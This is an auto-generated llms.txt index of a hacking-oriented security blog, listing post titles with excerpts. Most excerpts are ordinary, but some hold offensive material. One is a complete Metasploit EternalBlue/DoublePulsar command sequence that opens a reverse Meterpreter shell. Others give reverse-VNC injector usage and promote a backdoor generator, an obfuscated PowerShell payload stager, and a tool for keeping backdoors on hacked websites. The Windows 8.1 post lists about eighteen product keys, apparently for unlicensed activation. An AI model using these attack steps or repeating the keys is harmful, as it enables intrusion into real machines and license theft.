Generated by All in One SEO v4.9.10, this is an llms.txt file, used by LLMs to index the site. # Security Awareness Cyber Security ## Sitemaps - [XML Sitemap](https://who-ami.net/sitemap.xml): Contains all public & indexable URLs for this website. ## Posts - [Invoke Vnc](https://who-ami.net/invoke-vnc/) - Powershell VNC injector Invoke-Vnc executes a VNC agent in-memory and initiates a reverse connection, or binds to a specified port. Password authentication is supported. Usage example Invoke locally: Import-Module Invoke-Vnc.ps1 #Reverse VNC connection Invoke-Vnc -ConType reverse -IpAddress -Port 5500 -Password P@ssw0rd #Bind VNC connection Invoke-Vnc -ConType bind -Port 5900 -Password P@ssw0rd Invoke over net: - [Angry IP Scanner](https://who-ami.net/angry-ip-scanner/) - Angry IP Scanner is a cross-platform lightweight program that can scan IP addresses and their ports. It can determine the IP status, hostname, MAC address, NetBIOS information, MAC vendor, HTTP sender, and the TTL (Time-to-live). You can also extend the program’s functionality by using plugins (anyone who can write java code can create one). In order to increase - [Popular Tools for Brute-force Attacks](https://who-ami.net/popular-tools-for-brute-force-attacks/) - The brute-force attack is still one of the most popular password cracking methods. Nevertheless, it is not just for password cracking. Brute-force attacks can also be used to discover hidden pages and content in a web application. This attack is basically “a hit and try” until you succeed. This attack sometimes takes longer, but its - [The psychology of hackers](https://who-ami.net/the-psychology-of-hackers/) - There's an old quote mis-attributed to the famous bank robber Willie Sutton that claims when asked "Why do you rob banks?" he replied "Because that is where the money is!" When we ask "Why do hackers hack?" there is a temptation in this age of organised crime-driven malware to give the same answer. However - [Top 6 ways websites get hacked](https://who-ami.net/top-6-ways-websites-get-hacked/) - Top 6 ways websites get hacked 1. Compromised passwords Whether an attacker is using guessing techniques to obtain a password, or simply trying out common variations of passwords, compromised account credentials are a serious issue. It's important to create a strong password, not use the same password across multiple web properties, and use additional security - [How to install TeamViewer on Kali Linux](https://who-ami.net/how-to-install-teamviewer-on-kali-linux/) - TeamViewer on Kali Linux - [Pwn target's browser with BeeF - Bettercap and Metasploit](https://who-ami.net/pwn-targets-browser-with-beef-bettercap-and-metasploit/) - - Bettercap v1.5.8 - Metasploit msfconsole 4.12.41-dev - BeeF 0.4.7.0-alpha Objective: The objective is to create a hook.js address in beef and inject it in any machine inside your LAN without the victim knowing or having to interact with it. Also if by any chance their browser is exploitable you can get a shell using it - [Apt-get commands in Linux](https://who-ami.net/apt-get-commands-in-linux/) - Learn how to use apt-get commands What is apt-get? Ubuntu is derived from Debian Linux. And Debian uses dpkg packaging system. A packaging system is a way to provide programs and applications for installation. This way, you don’t have to build a program from the source code. APT (Advanced Package Tool) is the command line - [How to install Google Chrome on Kali Linux](https://who-ami.net/how-to-install-google-chrome-on-kali-linux/) - Google Chrome on Kali Linux - [How to access blocked websites](https://who-ami.net/how-to-access-blocked-websites/) - 1. Become Anonymous: Use Proxy Websites Very often, in a professional environment, the employers draw certain boundaries, restricting your the access to some particular websites. At times, you need a way to access the blocked websites and in those situations, proxy websites act as a rescue method. On the web, there are hundreds of proxy - [How to install windows 8.1 from usb device](https://who-ami.net/how-to-install-windows-8-1-from-usb-device/) - 6P3RV-NKC86-WKBPP-MRDHT-WW8XV 6W4NX-R4K9W-2HGYR-7XYDB-6VF9V CGWVF-N3VMK-CVG7W-MBB9Y-MY2KV D46QW-N3M4H-RY93J-DPMPY-43G67 QGQN6-KVGDF-3RYWW-XRWTM-88CKV QHRT7-BNHCX-W43BC-FPYBR-K4PKV TXPW4-R4NQM-44JJ2-TY6TD-M7RDH W8NRD-JQY8C-MYKKG-HYJK6-V49T7 CQ2PJ-C7MJC-T3RBP-NMWJH-2RYRQ JRMHB-9F327-NDT76-4T9KR-DJXWD 4PQWW-PPNY7-XJ8RJ-V6C4T-FVRFQ 9DDD3-84PXF-QNPXF-3PV8Q-G8XWD TWHQX-8CH4Y-39DN9-VD7MG-WW8Y3 GY8MV-86KDB-4XGNP-X3Y76-72WY3 JC9DV-2P37N-DKD3W-MKKV4-6Q4FQ PGB97-GJMN2-XB3CX-T86FB-88CM3 B783Q-MB34J-NG6K3-WH82J-82KWD 66HJB-X2N4J-Y42JB-T6GDB-RCWY3 Hit the Next button 16. Your account Enter your Username You can put a password if you want But - [Server Security](https://who-ami.net/improving-the-security-of-the-server-side-for-preventing-ssh-password-cracking/) - A password and cryptography attack that does not attempt to decrypt any information, but continue to try a list of different passwords, words, or letters. For example, a simple brute-force attack may have a dictionary of all words or commonly used passwords and cycle through those words until it gains access to the account. A - [Security Tips To Keep Yourself Safe From Hackers](https://who-ami.net/security-tips-to-keep-yourself-safe-from-hackers/) - If you are surfing the net or your computer is linked in anyway to Internet, you would be aware of the risks that cyber criminals pose to you. Computer security, also known as cybersecurity or IT security, is the protection of information systems from theft or damage to the hardware, the software, and to the information - [5 Most Popular Torrent Websites](https://who-ami.net/5-most-popular-torrent-websites/) - 1. The Pirate Bay Founded in 2003, It’s the first torrent hosting websites on the internet. TPB went into exile after its co-founder Peter Sunde was arrested following a raid on the website. A movie named The Pirate Bay Way From keyboard was also made. The website changed various domains before returning to its original - [Ubuntu Unity Features You May Not Have Known About](https://who-ami.net/ubuntu-unity-features-you-may-not-have-known-about/) - Ubuntu Unity Features You May Not Have Known About Did you know pressing the Alt key while using any program in Unity reveals a type your command window? This window is known as the Unity HUD. This is a very useful feature that isn’t as talked about anymore. Regardless of notoriety, the Unity HUD allows - [Hacking Windows using EternalBlue & DoublePulsar via Metasploit (MS17-010)](https://who-ami.net/hacking-windows-using-eternalblue-doublepulsar-via-metasploit-ms17-010/) - Hacking Windows using EternalBlue & DoublePulsar via Metasploit - [How to access the Darknet](https://who-ami.net/how-to-access-the-darknet/) - The Darknet - [HatCloud](https://who-ami.net/hatcloud/) - A Tool To Bypass CloudFlare For Identify Real IP Address HatCloud build in Ruby. It makes bypass in CloudFlare for discover real IP. This can be useful if you need test your server and website. Testing your protection against Ddos (Denial of Service) or Dos. CloudFlare is services and distributed domain name server services, sitting between - [1st steps after installing Kali Linux](https://who-ami.net/1st-steps-after-installing-kali-linux/) - 1st steps after installing Kali Linux - [Defend Your Ports with Port Scan Attack Detector (PSAD)](https://who-ami.net/defend-your-ports-with-port-scan-attack-detector-psad/) - The Port Scan Attack Detector (PSAD) is a lightweight system daemon that is designed to work with Linux iptables/firewall code to discover suspicious traffic such as port scans, backdoors, botnet command and control communications, and more. It includes a set of vastly configurable danger thresholds, long-winded alert messages that comprise of the source, destination, scanned - [Find the Exact Location of Any IP Address](https://who-ami.net/find-the-exact-location-of-any-ip-address/) - >>>gip = pygeopip.GeoIP(‘GeoLiteCity.dat’) Next, we are ready to begin our query. Let’s see where Google is located. >>>rec = gip.record_by_addr(‘64.233.161.99’) >>>for key.val in rec.items(): … print “%s: %s” %(key,val) … Please note that it is critical to indent the “print”. If not, you will throw an error. As you can see, we were able to - [Best Free File Encryption Tools For Android](https://who-ami.net/best-free-file-encryption-tools-for-android/) - You probably know that the encryption is one of the best ways to protect your files. But do you encrypt your files on your android device? If not, you should, because it’s your responsibility to protect your privacy. Crypt4All Lite This app allows you to encrypt your files with 256 bit AES algorithm. You can also set - [Useful Hacks Every Linux User Must Know](https://who-ami.net/useful-hacks-every-linux-user-must-know/) - The world of Linux is filled with so much fun and interesting stuffs, the more we go in, the more we find stuffs. In our efforts to bring those little hacks and tips for you that makes you different from others, here we have came up with three little tricks. 1. How to Schedule a - [Auto execute commands or scripts during reboot or startup](https://who-ami.net/auto-execute-commands-or-scripts-during-reboot-or-startup/) - This method is valid even for systemd-based distributions. In order for this method to work, you must grant execute permissions to /etc/rc.d/rc.local as follows: # chmod +x /etc/rc.d/rc.local and add your script at the bottom of the file. The following image shows how to run two sample scripts (/home/gacanepa/script1.sh and /home/gacanepa/script2.sh) using a cron job - [Become a Penetration Tester](https://who-ami.net/become-a-penetration-tester/) - What Does a Penetration Tester Do? The Short Version A Penetration Tester (a.k.a. Ethical Hacker) probes for and exploits security vulnerabilities in web-based applications, networks and systems. In other words, you get paid to legally hack. In this “cool kid” job, you will use a series of penetration tools – some predetermined, some that you - [Linux Security](https://who-ami.net/securing-your-linux-system/) - Linux security tips and tricks ! Are you running Linux just because you think it's safer than Windows? Think again. Sure, security is a built-in (and not a bolt-on) feature and extends right from the Linux kernel to the desktop, but it still leaves enough room to let someone muck about with your /home folder. - [XPath Injection & Blind XPath Injection Vulnerability](https://who-ami.net/xpath-injection-blind-xpath-injection-vulnerability/) - XPath Injection Similar to SQL injection, XPath injection occurs when the site uses the information entered by the user to construct the request for XML data. An attacker sends specially constructed information to the site to explore how the XML used by the site is constructed, and even to obtain data that is not available - [Simple coding languages for the first-time programmers](https://who-ami.net/simple-coding-languages-for-the-first-time-programmers/) - Programming is one of the best career choices in today’s world as more and more services are shifting online. It pays good and it also offers a challenge to anyone who chooses coding as a career. However choosing it as a career or hobby raises many questions in a youngster’s mind and through this - [Private Search Engines That Do Not Track You](https://who-ami.net/private-search-engines-that-do-not-track-you/) - DuckDuckGo DuckDuckGo is a very secure search engine that never tracks your searches while providing you really good search experience. The main purpose of building this search engine is for people who likes to remain private while searching, and delivers instant results without tailored ads on the search pages. DuckDuckGo gets around 10M+ searches a - [Windows Command Prompt Commands](https://who-ami.net/windows-command-prompt-commands/) - The Command Prompt (CMD) provides access to over 280 commands in Windows. These commands are used to do certain task from the command line in operating system instead of the graphical Windows Interface. Note: please take a note that the commands in Windows 10, 8, 7 or XP are called command prompt and the commands - [Kali Linux Tools](https://who-ami.net/kali-linux-tools/) - Information Gathering acccheck ace-voip Amap Automater bing-ip2hosts braa CaseFile CDPSnarf cisco-torch Cookie Cadger copy-router-config DMitry dnmap dnsenum dnsmap DNSRecon dnstracer dnswalk DotDotPwn enum4linux enumIAX Fierce Firewalk fragroute fragrouter Ghost Phisher GoLismero goofile hping3 InTrace iSMTP lbd Maltego Teeth masscan Metagoofil Miranda Nmap ntop p0f Parsero Recon-ng SET smtp-user-enum snmp-check sslcaudit SSLsplit sslstrip SSLyze THC-IPV6 theHarvester - [Nmap (Network Mapper)](https://who-ami.net/nmap-network-mapper/) - What is Nmap? Nmap is an abbreviation for Network Mapper – Network in an IT sense of the word. You can consider Nmap as being one of the best-known, and in fact, one of the most useful hacking tools out there. Period. If you are serious about pentesting, ethical hacking and IT Security in general, - [TheFatRat v1.8](https://who-ami.net/thefatrat-v1-8/) - Tool For Generate Backdoor with Msfvenom What is TheFatRat ? An easy tool to generate backdoor with msfvenom (a part from metasploit framework) and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . - [How to change Kali Linux root password](https://who-ami.net/how-to-change-kali-linux-root-password/) - Change Kali Linux Root Password - [Hacking Windows using EternalBlue & DoublePulsar via Metasploit](https://who-ami.net/hacking-windows-using-eternalblue-doublepulsar-via-metasploit/) - apt-get update apt-get install wine cd Desktop/ git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git cd Eternalblue-Doublepulsar-Metasploit cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ use exploit/windows/smb/eternalblue_doublepulsar options set DOUBLEPULSARPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps set ETERNALBLUEPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps options set PROCESSINJECT explorer.exe set RHOST 192.168.0.102 set TARGETARCHITECTURE x86 show targets set target 9 set PAYLOAD windows/meterpreter/reverse_tcp ifconfig set LHOST 192.168.0.106 exploit You can also see a demo - [Beef + how to get new version](https://who-ami.net/beef-how-to-get-new-version/) - What is BeEF? BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. - [This Facebook tool lets you spy on anyone on Facebook](https://who-ami.net/this-facebook-tool-lets-you-spy-on-anyone-on-facebook/) - This Facebook tool lets you spy on anyone on Facebook This tool taps the power of a mostly-forgotten Facebook feature called Graph Search that was launched by the social media giant in 2013. The intention to create Stalkscan is to highlight how much information Facebook users post about themselves, even without thinking about the - [Amazing Hidden Features Of Google Search](https://who-ami.net/amazing-hidden-features-of-google-search/) - Amazing Hidden Features Of Google Search No one would argue the fact that Google is one of the most useful sites on the Internet. Unfortunately, most people only use about 3% of its power. Smart Google users, on the other hand, know how to turn Google into a quick calculator, translate foreign sites, create their - [Hack Windows with the New Media Center Exploit](https://who-ami.net/hack-windows-with-the-new-media-center-exploit/) - (September 8, 2015) to close another vulnerability in their Windows Vista, 7, 8, and 8.1 operating systems. The vulnerability in question (MS15-100) enabled an attacker to gain remote access to any of these systems using a well-crafted Media Center link (MCL) file. As hackers, we need to take a multipronged approach to gaining access - [How to repair a corrupt SD Card](https://who-ami.net/here-is-how-to-repair-a-corrupt-sd-card/) - How to fix a corrupt memory card How to Preserve your important and precious data from being corrupted and recover from accidental deletions SD cards are great as they are small in size, lightweight and versatile (you can store any type of data on them). But what happens when a SD card on which you stored - [vsaudit - VOIP Security](https://who-ami.net/vsaudit-voip-security/) - vsaudit This is an opensource tool to perform attacks to general voip services It allows to scans the whole network or single host to do the gathering phase, then it is able to search for most known vulnerabilities on the founds alive hosts and try to exploit them. Install dependencies To start using vsaudit you - [Install And Run Kali Linux On Android](https://who-ami.net/install-and-run-kali-linux-on-android/) - android@10.0.0.10 password: Linux localhost 3.4.5-447845 #1 SMP PREEMPT Fri Apr 12 17:22:34 KST 2013 armv7l Kali GNU/Linux 1.0 [running on Android via Linux Deploy] android@localhost:~$ sudo su root@localhost:/home/android# df Filesystem 1K-blocks Used Available Use% Mounted on /dev/loop3 4180944 667268 3304012 17% / tmpfs 952708 80 952628 1% /dev tmpfs 952708 0 952708 0% /dev/shm root@localhost:/home/android# - [How to add new user in Kali Linux](https://who-ami.net/how-to-add-new-user-in-kali-linux/) - Add new user in Kali Linux - [How to install adobe flash player on Kali Linux](https://who-ami.net/how-to-install-adobe-flash-player-on-kali/) - Adobe Flash Player on Kali Linux - [Find SQL Injection](https://who-ami.net/find-sql-injection/) - Find SQL Injection What is python_gdork_sqli? python_gdork_sqli is a python script is developed to show, how many vulnerables websites, which are laying around on the web. The main focus of the script is to generate a list of vuln urls. Please use the script with causing and alert the webadmins of vulnerable pages. The SQLmap - [How To Make a Pendrive Bootable Using Command Prompt(CMD)](https://who-ami.net/how-to-make-a-pendrive-bootable-using-command-promptcmd/) - Make a Pendrive Bootable Using Command Prompt To create a bootable USB drive manually, we will use the Command Prompt as a Windows default program. Here are step by step to create a bootable USB drive as the Windows installation media. To create a bootable USB drive as a Windows installation media, we require at - [How to change mac address in Kali Linux](https://who-ami.net/how-to-change-mac-address-in-kali-linux/) - Change mac address in Kali Linux - [SQL Injection](https://who-ami.net/sql-injection/) - What is SQL Injection? SQL injection (SQLi) is an application security weakness that allows attackers to control an application’s database – letting them access or delete data, change an application’s data-driven behavior, and do other undesirable things – by tricking the application into sending unexpected SQL commands. SQL injection weaknesses occur when an application uses - [Aircrack-ng](https://who-ami.net/aircrack-ng/) - Download for Windows Compiling and installing wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz tar -zxvf aircrack-ng-1.2-rc4.tar.gz cd aircrack-ng-1.2-rc4 make make install Compiling with Airolib-ng support Simply append 'sqlite=true' parameter to make and make install: make sqlite=true make sqlite=true install Compiling with PCRE support Airodump-ng can match SSID with a regular expression when compiled with PCRE: make pcre=true make pcre=true install - [Buffer overflow attack](https://who-ami.net/buffer-overflow-attack/) - What is Buffer overflow? Buffer overflow, in the presence of a buffer overflow security vulnerabilities in the computer, the attacker can exceed the normal length of the number of characters to fill a domain, usually the memory address. In some cases, these excess characters can be run as “executable” code. So that an attacker can - [Essential Programming Languages for Hackers](https://who-ami.net/essential-programming-languages-for-hackers/) - Essential Programming Languages for Hackers Every application or site you use is programmed in a particular computer language also known as Programming and people such as Hackers tries to hack it but to break anything first you need to understand and then exploit its weakness, same happens in Hacking, To actually hack anything first you'll - [How to hack wifi password](https://who-ami.net/how-to-hack-wifi-password/) - Hack wifi password - [Kali Linux Commands](https://who-ami.net/kali-linux-commands/) - A-Z Kali Linux commands which will help you. Kali Linux commands Function A apropos Search Help manual pages (man -k) apt-get Search for and install software packages (Debian) aptitude Search for and install software packages (Debian) aspell Spell Checker awk Find and Replace text, database sort/validate/index B basename Strip directory and suffix from filenames bash - [How to Track Geo Location Of Any Device Using Kali Linux](https://who-ami.net/to-track-geo-location-of-any-device-using-kali-linux/) - How to Track Geographical location of any device Now you must be thinking; What is a Mac Address?? MAC stands for Media Access Control, is a unique address of each hardware device. It’s a 48-bit address. Starting 24-bit is assigned by IEEE and last 24-bit is assigned by Manufacturers. Basically, to do this we are - [Signs that you might have been hacked](https://who-ami.net/signs-that-you-might-have-been-hacked/) - Signs that you might have been hacked Cybersecurity is one of the biggest threats to anyone who has an online presence these days. While having an antimalware software installed on one’s system does provide some relief but there is no guarantee that your system is completely safe from cybersecurity attacks. And if this is - [Malicious Word document can attack Windows and macOS System](https://who-ami.net/malicious-word-document-can-attack-windows-and-macos-system/) - FortiGuard means that once a macro command executes a python script, it will download the file without the knowledge of the victim and execute it on the local machine. The script tries to connect to the 443 port of the target host, but the server did not respond in the FortiGuard test . - [Iptables Examples](https://who-ami.net/iptables-examples/) - # iptables -L -n -v Sample outputs: Chain INPUT (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in - [How to transfer pictures from android to pc without usb cable](https://who-ami.net/how-to-transfer-pictures-from-android-to-pc-without-usb-cable/) - WiFi File Transfer WiFi File Transfer lets you upload and download files to/from your phone or tablet over a wireless connection. Easy-to-use web interface, no USB cable needed. • Upload or download multiple files at once • Upload entire folder structures (Google Chrome only) • Delete, rename, copy, zip or unzip files using the built-in - [Wi-Fi Hacking Tools](https://who-ami.net/wi-fi-hacking-tools/) - How to Hack Wifi has become one of the most searched queries on the Internet, People are curious to learn this Technique. Around 48% of our viewers questioned us that what are the tools that can be used for Wifi hacking. Aircrack-ng Aircrack-ng is one of the most famous tools used in Kali for cracking - [Brute-force SMB shares](https://who-ami.net/brute-force-smb-shares/) - “After a list of shares is found, the script attempts to connect to each of them anonymously, which divides them into anonymous, for shares that the NULL user can connect to, or restricted, for shares that require a user account.” – https://nmap.org/nsedoc/scripts/smb-enum-shares.html nmap -sS -sV --script smb-enum-shares.nse,smb-os-discovery.nse -p445,139 192.168.1.0/24 Use the smb-os-discovery.nse script to discover - [LUKS Vulnerability, Hacking Linux with single Key Press !](https://who-ami.net/luks-vulnerability-hacking-linux-with-single-key-press/) - A new vulnerability has just surfaced that can compromise your Linux system by pressing the Enter key. The issue is available within the Linux Unified Key Setup (LUKS), majorly affecting Debian & Fedora & Ubuntu (Ubuntu is Debian Based) platforms. Tracked as CVE-2016-4484, the LUKS vulnerability is discovered by Spanish security researcher Hector Marco. It - [Find the IMEI Number of a Lost or Stolen Android Phone](https://who-ami.net/find-the-imei-number-of-a-lost-or-stolen-android-phone/) - Each cell telephone has an one of a kind ID number called IMEI, which remains for “International Mobile Station Equipment Identity”. This number can be utilized to distinguish a mobile’s basic data, for example, originality, vendor, model number, and so on. Administrators can likewise check the gadget’s subtle elements, status and area utilizing this IMEI - [CloudFail](https://who-ami.net/cloudfail/) - Find hidden IP’s behind the CloudFlare network CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases. Misconfigured - [How to Hack a Computer](https://who-ami.net/how-to-hack-a-computer/) - Hacking was used to help with gaining information about system for IT purposes when it was brought to the public’s attention as something that was not all bad. It is now days that hacking has taken on a darker meaning thanks to those who use their skills for personal gain while hurting others. When you - [Stop the NSA From Spying Through Your Webcam](https://who-ami.net/stop-the-nsa-from-spying-through-your-webcam/) - You already know that laptops, desktop computers, tablets and mobile phones are all at risk of being hacked. But did you know that intruders might use the built-in camera to take surreptitious pictures and videos of you and your surroundings or hijack your microphone to eavesdrop on conversations? The latest story from the Edward Snowden - [Autopsy – A Digital Forensic Tool](https://who-ami.net/autopsy-a-digital-forensic-tool/) - The Autopsy is a forensic tool which is used by the military, law enforcement, and corporate examiners to investigate what had happened on a smartphone or a computer. The Autopsy has a plug-in architecture which allows the user to find add-on modules or even develop custom modules written in Java or Python. Main features of Autopsy are: - [redsnarf (red-teaming tool for Windows )](https://who-ami.net/redsnarf-red-teaming-tool-for-windows/) - red-teaming tool for Windows (pen-testing) • Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password; • Retrieval of MS cached credentials; • Pass-the-hash; • Quickly identify weak and guessable username/password combinations (default of administrator/Password01); • The ability to retrieve hashes across a range; • Hash spraying – Credsfile will - [EAPHammer](https://who-ami.net/eaphammer/) - Begin by cloning the eaphammer repo using the following command. git clone https://github.com/s0lst1c3/eaphammer.git Next run the kali-setup.py file as shown below to complete the eaphammer setup process. This will install dependencies and compile hostapd. python setup.py Other Distros If you are not using Kali, you can still compile eaphammer. I just haven't written a setup - [Findsploit](https://who-ami.net/findsploit/) - ABOUT Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes "copysploit" to copy any exploit-db exploit to the current directory and "compilesploit" to automatically compile and run any C exploit (ie. ./copysploit 1337.c && ./compilesploit 1337.c). For updates to this script, use git - [ShodanHat](https://who-ami.net/shodanhat/) - You need to install shodan with pip install shodan or easy_install shodan. You need to install python-nmap with pip install python-nmap. You need to set your API Key in the 'constantes.py' file. Options -h, --help show this help message and exit -i IP, --ip=IP info about one host -l LIST, --list=LIST info about a list - [Learn to Hack WIFI password with Ubuntu (WPA/WPA2)](https://who-ami.net/learn-to-hack-wifi-password-with-ubuntu-wpawpa2/) - Requirements: Install aircrack-ng by typing sudo apt-get install aircrack-ng Airodump-ng / Airmon-ng commands Reaver 1.4 (Install in Step 1) 1) We need to have the wireless BSSID (Mac address) so we use airodump-ng. Open a terminal and Type : airmon-ng start wlan0 Type airodump-ng mon0 It will lists the available wireless passwords, now copy the BSSID of the Access - [ssh_scan](https://who-ami.net/ssh_scan/) - prototype SSH configuration and policy scanner ssh_scan A SSH configuration and policy scanner Key Benefits Minimal Dependancies – Uses native Ruby and BinData to do its work, no heavy dependancies. Not Just a Script – Implementation is portable for use in another project or for automation of tasks. Simple – Just point ssh_scan at an - [Microsoft will disable SMBv1 protocol on the next update for Windows 10](https://who-ami.net/microsoft-will-disable-smbv1-protocol-on-the-next-update-for-windows-10/) - Microsoft plans to release the next major update for Windows 10, which is codenamed Redstone 3. In this release, Microsoft plans to disable the 30-year-old SMBv1 file sharing protocol. At present, due to compatibility reasons, Microsoft is still in all versions of the Windows operating system by default enabled SMBv1, but the implementation of the SMBv1 protocol - [TheFatRat](https://who-ami.net/thefatrat/) - TheFatRat a Massive Exploiting Tool Revealed An easy tool to generate backdoor and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability - [USB flash drive - Maintain Windows](https://who-ami.net/what-to-do-with-your-usb-flash-drive-maintain-windows/) - Download the ISO of Parted Magic and the UNetbootin utility. The zipped ISO file is named pmagic-6.3.iso-x86_64.zip and the UNetbootin utility is named unetbootin-win-549.exe. Step 2: After extracting the Parted Magic ISO from the zip file, run UNetbootin by double-clicking on unetbootin-win-549.exe. Step 3: Change the selection from "Distribution" to "Diskimage" and click the button - [Dagon - advanced hash cracking](https://who-ami.net/dagon-advanced-hash-cracking-and-manipulation-system/) - Named after the prince of Hell, Dagon (day-gone) is a advanced hash cracking and manipulation system, capable of bruteforcing multiple hash types, creating bruteforce dictionaries, automatic hashing algorithm verification, random salt generation from unicode to ascii, and much more. What is Dagon? Dagon is an advanced hash cracking and hash manipulation system build on Python 2.7.x. It - [Brute-Forcing HTML Form Authentication (Python)](https://who-ami.net/brute-forcing-html-form-authentication-python/) - or if you’re consulting, you might need to assess the password strength on an existing web system. It has become more and more common for web systems to have brute-force protection, whether a captcha, a simple math equation, or a login token that has to be submitted with the request. There are a number of - [Who is Responsible For WannaCry Ransomware Attack?](https://who-ami.net/who-is-responsible-for-wannacry-ransomware-attack/) - Responsible For WannaCry: The question arises from Washington that who is the one engaged in the security error. The security error exploited by hackers which damaged many businesses and public organizations in the whole world. The recent cyber attack was the biggest ransomware attack in the globe. The following are some replies from some associations - [Web Vulnerability Scan ( Metasploit )](https://who-ami.net/web-vulnerability-scan-metasploit/) - Web Vulnerability Scan (WMAP) Introduce The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known sub-project is the open source[2] Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the - [Shellstack](https://who-ami.net/shellstack/) - Manage All Your Backdoored Websites Efficiently ShellStack is a PHP based backdoor management tool. This Tool comes handy for “HACKERS” who wish to keep a track of every website they hack. The tool generates a backdoor file which you just have to upload to the site and put the backdoor URL in the shells.txt - [10 plug-ins to enhance the security of WordPress Website](https://who-ami.net/10-plug-ins-to-enhance-the-security-of-wordpress-website/) - Secure WordPress Website Security Protection: Firewall Security, Login Security, Database Security & Backup… View Security feature highlights below. View BulletProof Security feature details for specific details about security features. Secure your WordPress website even further by adding additional BulletProof Security Bonus Custom Code (See the BulletProof Security Bonus Custom Code help section). Effective, Reliable & - [PowerStager](https://who-ami.net/powerstager/) - A payload stager using PowerShell This script creates an executable stager that downloads a selected powershell payload, loads it into memory and executes it using obfuscated EC methods. The script will also encrypt the stager for dynamic signatures and some additional obfuscation. This enables the actual payload to be executed indirectly without the victim downloading - [Powershell Toolkit](https://who-ami.net/powershell-toolkit/) - Powershell Toolkit Collection PowerMemory: https://github.com/giMini/PowerMemory Exploit the credentials present in files and memory ReflectiveDLLInjection: https://github.com/stephenfewer/ReflectiveDLLInjection Reflective DLL injection is a library injection technique that is primarily used to perform the loading of a library from memory to host processes. The library should therefore be able to load itself by implementing a minimal PE file loader, - [Microsoft was shocked!](https://who-ami.net/microsoft-was-shocked/) - Windows 10 source code online leak: a total of 32TB Exclusive A massive trove of Microsoft's internal Windows operating system builds and chunks of its core source code have leaked online. The data – some 32TB of official and non-public installation images and software blueprints that compress down to 8TB – were uploaded - [Wi-Fi Hacking Apps For Android](https://who-ami.net/wi-fi-hacking-apps-for-android/) - Hacking, which was once considered the exclusive domain of the “experts” has become very common phenomenon with the rise of technology and advancements in the mobile field. Android phones are most popular because of the availability of millions of apps in market. But is it possible to hack Wi-Fi using Android smartphone? Yes, it is - [Most commonly Used Linux Commands](https://who-ami.net/most-commonly-used-linux-commands-2/) - Most commonly Used Linux Commands Basic linux commands with examples tar command examples Create a new tar archive. $ tar cvf archive_name.tar dirname/ Extract from an existing tar archive. $ tar xvf archive_name.tar View an existing tar archive. $ tar tvf archive_name.tar grep command examples Search for a given string in a file (case in-sensitive - [Chinese malware infects 250 million computers around the world (Fireball)](https://who-ami.net/chinese-malware-infects-250-million-computers-around-the-world-fireball/) - “A quarter-billion computers could very easily become victims of real malware. It installs a backdoor into all these computers that can be very, very easily exploited in the hands of the Chinese people behind this campaign,” said Maya Horowitz, Head of Check Point Research Team. Based on analysis of its own network of clients, Check Point estimated - [Microsoft Windows LNK CVE-2017-8464 Remote Code Execution Vulnerability](https://who-ami.net/microsoft-windows-lnk-cve-2017-8464-remote-code-execution-vulnerability/) - Bypass Antivirus & Exploit Windows Using PowerShell Microsoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions. Affected Version Microsoft Windows 10 Version 1607 for 32-bit Systems Microsoft Windows 10 Version 1607 for x64-based - [BruteSploit (Automated generate, bruteforce and manipulation wordlist)](https://who-ami.net/brutesploit-automated-generate-bruteforce-and-manipulation-wordlist/) - Brutesploit BruteSploit is a collection of method for automated Generate, Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and can be used in CTF for manipulation,combine,transform and permutation some words or file text :p i wrote this just for fun and learn how create interactive shell - [SigPloit](https://who-ami.net/sigploit/) - A Telecom Signaling Exploitation Framework - SS7, GTP, Diameter And SIP SiGploit a signaling security testing framework dedicated to Telecom Security professionals and researchers to pentest and exploit vulnerabilities in the signaling protocols used in mobile operators regardless of the generation being in use. SiGploit aims to cover all used protocols used in - [Run Linux On Windows 10 Without Activating Developer Mode](https://who-ami.net/run-linux-on-windows-10-without-activating-developer-mode/) - A few days ago, Microsoft released Windows 10 Insider Build 16215. The builds let users run Windows Subsystem for Linux without the need to activate Developer Mode. Users need to search for Turn Windows Features On or Off in the Start Menu and then enable the option ‘Windows Subsystem for Linux” to run the Windows - [Tater](https://who-ami.net/tater/) - Hot Potato Windows Privilege Escalation exploit on PowerShell Tater Tater is a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit. Credit All credit goes to @breenmachine, @foxglovesec, Google Project Zero, and anyone else that helped work out the details for this exploit. Potato - https://github.com/foxglovesec/Potato Included In p0wnedShell - https://github.com/Cn33liz/p0wnedShell PowerShell Empire - [Metasploit Command List](https://who-ami.net/metasploit-command-list/) - show payloads: lists all attack loads in the metasploit framework. show auxiliary: lists all secondary attack loads in the metasploit framework. search name: find all the infiltration attacks and other modules in the metasploit framework. info: Displays information about infiltration attacks or modules. use module_name: load a penetration attack or module. LHOST : you can let the target host to connect - [HellRaiser](https://who-ami.net/hellraiser/) - Vulnerability Scanner Install Install ruby, bundler and rails. https://gorails.com/setup/ubuntu/16.04 Install redis-server and nmap. sudo apt-get update sudo apt-get install redis-server nmap Install the foreman gem. gem install foreman Clone HellRaiser 